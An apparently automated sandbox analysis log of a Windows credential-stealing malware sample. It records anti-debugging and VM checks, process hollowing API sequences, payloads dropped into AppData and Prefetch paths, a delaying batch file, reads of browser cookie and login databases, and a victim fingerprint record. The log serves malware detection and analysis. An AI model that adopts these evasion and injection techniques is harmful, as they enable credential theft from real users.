                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 589719Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 589420Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 589090Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 588773Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 588593Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 588439Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 588312Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 588203Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 588093Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587984Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587875Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587756Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587640Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587531Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587406Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587281Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587172Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 587062Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 586953Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 586844Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 586727Jump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeThread delayed: delay time: 586624Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: Amcache.hve.9.drBinary or memory string: VMware
                                Source: HxB6eC7UvM.18.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                                Source: HxB6eC7UvM.18.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                                Source: HxB6eC7UvM.18.drBinary or memory string: global block list test formVMware20,11696428655
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3324352793.000000001C04C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,1169642
                                Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: HxB6eC7UvM.18.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                                Source: 7Up9zvGH4w.exe, 0000000A.00000002.2796069543.00000165B8030000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:M
                                Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                                Source: HxB6eC7UvM.18.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                                Source: Amcache.hve.9.drBinary or memory string: vmci.sys
                                Source: HxB6eC7UvM.18.drBinary or memory string: AMC password management pageVMware20,11696428655
                                Source: HxB6eC7UvM.18.drBinary or memory string: tasks.office.comVMware20,11696428655o
                                Source: HxB6eC7UvM.18.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                                Source: HxB6eC7UvM.18.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                                Source: HxB6eC7UvM.18.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                                Source: Amcache.hve.9.drBinary or memory string: VMware20,1
                                Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
                                Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                Source: HxB6eC7UvM.18.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                                Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
                                Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
                                Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
                                Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                Source: HxB6eC7UvM.18.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                                Source: HxB6eC7UvM.18.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                                Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                Source: HxB6eC7UvM.18.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                                Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
                                Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
                                Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
                                Source: HxB6eC7UvM.18.drBinary or memory string: discord.comVMware20,11696428655f
                                Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
                                Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                                Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                                Source: HxB6eC7UvM.18.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                                Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: HxB6eC7UvM.18.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                                Source: HxB6eC7UvM.18.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                                Source: HxB6eC7UvM.18.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                                Source: HxB6eC7UvM.18.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                                Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                                Source: HxB6eC7UvM.18.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                                Source: HxB6eC7UvM.18.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                                Source: HxB6eC7UvM.18.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                                Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3301476280.0000000000642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: HxB6eC7UvM.18.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                                Source: HxB6eC7UvM.18.drBinary or memory string: outlook.office.comVMware20,11696428655s
                                Source: HxB6eC7UvM.18.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                                Source: HxB6eC7UvM.18.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                                Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                                Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
                                Source: HxB6eC7UvM.18.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                                Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
                                Source: HxB6eC7UvM.18.drBinary or memory string: dev.azure.comVMware20,11696428655j
                                Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: HxB6eC7UvM.18.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                                Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                Source: HxB6eC7UvM.18.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001F60A4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001F60A4
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_002131B4 mov edi, dword ptr fs:[00000030h]0_2_002131B4
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001D0350 mov edi, dword ptr fs:[00000030h]0_2_001D0350
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001D0350 mov edi, dword ptr fs:[00000030h]0_2_001D0350
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001D0350 mov edi, dword ptr fs:[00000030h]0_2_001D0350
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001D0350 mov edi, dword ptr fs:[00000030h]0_2_001D0350
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001D1D4E mov edi, dword ptr fs:[00000030h]0_2_001D1D4E
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001D0350 mov edi, dword ptr fs:[00000030h]5_2_001D0350
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001D0350 mov edi, dword ptr fs:[00000030h]5_2_001D0350
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001D0350 mov edi, dword ptr fs:[00000030h]5_2_001D0350
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001D0350 mov edi, dword ptr fs:[00000030h]5_2_001D0350
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001D1D4E mov edi, dword ptr fs:[00000030h]5_2_001D1D4E
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_0041914C mov eax, dword ptr fs:[00000030h]6_2_0041914C
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_004114A6 mov ecx, dword ptr fs:[00000030h]6_2_004114A6
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001FD2D0 GetProcessHeap,0_2_001FD2D0
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001F6098 SetUnhandledExceptionFilter,0_2_001F6098
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001F60A4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001F60A4
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001FA5FA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_001FA5FA
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001F56C2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_001F56C2
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001F6098 SetUnhandledExceptionFilter,5_2_001F6098
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001F60A4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_001F60A4
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001FA5FA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_001FA5FA
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 5_2_001F56C2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_001F56C2
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_00407B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00407B01
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_00407C63 SetUnhandledExceptionFilter,6_2_00407C63
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_00407D75 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00407D75
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 6_2_0040DD78 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0040DD78
                                Source: C:\Users\user\AppData\Roaming\7Up9zvGH4w.exeCode function: 10_2_00007FF64C4028E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF64C4028E4
                                Source: C:\Users\user\AppData\Roaming\7Up9zvGH4w.exeCode function: 10_2_00007FF64C402BE0 SetUnhandledExceptionFilter,10_2_00007FF64C402BE0
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_002131B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_002131B4
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeMemory written: C:\Users\user\Desktop\KyC6hVwU8Z.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Users\user\Desktop\KyC6hVwU8Z.exe "C:\Users\user\Desktop\KyC6hVwU8Z.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Users\user\Desktop\KyC6hVwU8Z.exe "C:\Users\user\Desktop\KyC6hVwU8Z.exe"Jump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Users\user\AppData\Roaming\7Up9zvGH4w.exe "C:\Users\user\AppData\Roaming\7Up9zvGH4w.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeProcess created: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe "C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pfyxVLTZvp.bat" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe "C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe" Jump to behavior
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.0000000002639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.4",5,1,"","user","066656","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\Prefetch\\ReadyBoot","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7503 / -74.0014"]
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.000000000250C000.00000004.00000800.00020000.00000000.sdmp, PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.0000000002639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.0000000002639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .4",5,1,"","user","066656","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\Prefetch\\ReadyBoot","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7503 / -74.0014"]
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.0000000002639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.4",5,1,"","user","066656","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Windows\\Prefetch\\ReadyBoot","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.228","US / United States","New York / New York","40.7503 / -74.0014"] m^
                                Source: PfjsOcNiQfAmiszo.exe, 00000012.00000002.3302655841.0000000002639000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001F5E5D cpuid 0_2_001F5E5D
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_0041E825
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: EnumSystemLocalesW,6_2_00414138
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: GetLocaleInfoW,6_2_0041EA78
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_0041EBA1
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,6_2_0041E412
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: GetLocaleInfoW,6_2_0041ECA7
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_0041ED76
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: GetLocaleInfoW,6_2_0041465E
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: GetLocaleInfoW,6_2_0041E60D
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: EnumSystemLocalesW,6_2_0041E6FF
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: EnumSystemLocalesW,6_2_0041E6B4
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: EnumSystemLocalesW,6_2_0041E79A
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeQueries volume information: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeQueries volume information: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe VolumeInformationJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\KyC6hVwU8Z.exeCode function: 0_2_001F6525 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_001F6525
                                Source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                                Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
                                Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                                Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: 6.2.KyC6hVwU8Z.exe.400000.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.KyC6hVwU8Z.exe.400000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.KyC6hVwU8Z.exe.436080.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.pPTyCqA3ru.exe.50000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.KyC6hVwU8Z.exe.436080.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000012.00000002.3302655841.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2796508370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.3302655841.0000000002639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000012.00000002.3302655841.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.2794932818.0000000000052000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: KyC6hVwU8Z.exe PID: 2292, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: pPTyCqA3ru.exe PID: 2132, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: PfjsOcNiQfAmiszo.exe PID: 6180, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Program Files (x86)\MSBuild\Microsoft\PfjsOcNiQfAmiszo.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\pPTyCqA3ru.exe, type: DROPPED
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
